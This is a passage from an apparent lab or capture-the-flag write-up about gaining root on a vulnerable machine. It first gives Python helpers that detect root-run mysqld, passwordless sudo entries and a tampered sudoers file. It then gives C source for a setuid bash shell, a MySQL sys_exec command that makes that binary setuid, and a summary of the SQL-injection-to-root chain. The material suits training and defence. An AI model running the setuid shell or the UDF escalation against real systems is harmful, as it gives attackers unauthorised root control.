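        if user == "root" and command.split()[0].endswith("/mysqld"):
            pids.append(int(pid))
    return pids


def passwordless_all(sudoers_text):
    """(user, line) pairs for entries that grant ALL commands with NOPASSWD.
    Accepts the page's spacing variant 'NOPASSWD :ALL' as well as 'NOPASSWD: ALL'.
    Simplified: '#include' directives and multi-line entries are not handled."""
    findings = []
    for raw in sudoers_text.splitlines():
        line = raw.split("#", 1)[0].strip()        # drop comments
        if not line or line.startswith("Defaults"):
            continue
        m = re.match(r"^(\S+)\s+\S+\s*=\s*(.*)$", line)   # User Host=Spec
        if not m:
            continue
        user, spec = m.group(1), m.group(2)
        spec = re.sub(r"\([^)]*\)", "", spec)      # drop the Runas_Spec, e.g. (ALL)
        spec = re.sub(r"\s*:\s*", ":", spec).strip()
        if "NOPASSWD:" in spec and spec.split(":")[-1].strip() == "ALL":
            findings.append((user, raw.strip()))
    return findings


def sudoers_tampered(mode, uid, gid):
    """True when /etc/sudoers deviates from the expected 0440 root:root.
    Both deviations seen on the page (chown to john:john, chmod 777) trip this."""
    return (mode & 0o777) != 0o440 or uid != 0 or gid != 0


if __name__ == "__main__":
    import os
    print("root-owned mysqld PIDs:", mysqld_as_root(SAMPLE_PS))
    print("passwordless ALL entries:", passwordless_all(SAMPLE_SUDOERS))
    try:                                           # live check, if the file is readable
        st = os.stat("/etc/sudoers")
        print("/etc/sudoers tampered:", sudoers_tampered(st.st_mode, st.st_uid, st.st_gid))
    except OSError as err:
        print("/etc/sudoers not checked:", err)
```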

Another guy escalated with a program written in C: upload the compiled binary and use MySQL's root privileges to make it runnable as root, which gives a bash shell.

Here is the C source:

```c
#define _GNU_SOURCE   /* setresuid/setresgid are GNU extensions declared in <unistd.h> */
#include <stdlib.h>   /* system() */
#include <unistd.h>

int main(void)
{
    // Set the real, effective and saved user IDs to 0, i.e. root
    setresuid(0, 0, 0);

    // Set the real, effective and saved group IDs to 0, i.e. root's group
    setresgid(0, 0, 0);

    // Call system() to run /bin/bash and start an interactive bash shell
    system("/bin/bash");

    return 0;
}
```

Give the compiled binary the setuid bit and 777 permissions through sys_exec, then run the exploit as john to get root:

```
mysql> SELECT sys_exec('chmod +s,a+rwx /tmp/exploit');
```

# Wrap-up

SQL injection through the login endpoint

After obtaining credentials, log in over ssh with the DSS host-key algorithm enabled

Bypass the lousy shell, then escalate through the root-owned MySQL

I also tried using ssh_login in metasploit to get a session back and then do UDF privilege escalation, but the ssh algorithm is not supported in that module. So I wanted to try a reverse shell instead, but bash would not give me one; if anyone knows why, give me a kick.